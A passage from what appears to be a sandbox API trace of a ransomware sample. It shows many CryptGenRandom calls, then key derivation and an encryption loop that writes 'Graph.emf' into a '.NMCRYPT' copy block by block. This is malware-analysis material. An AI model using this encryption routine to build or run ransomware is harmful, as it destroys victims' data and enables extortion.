hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.281] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.282] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.282] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.283] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0163.283] CryptHashData (hHash=0x9ad738, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.283] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad5b8) returned 1 [0163.283] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.283] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.283] wcslen (_String="\\\\?\\") returned 0x4 [0163.283] CryptDuplicateKey (in: hKey=0x9ad5b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad338) returned 1 [0163.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.284] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=116724) returned 1 [0163.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.285] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.285] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.285] GetLastError () returned 0x0 [0163.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.286] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.286] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.286] GetLastError () returned 0x0 [0163.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, 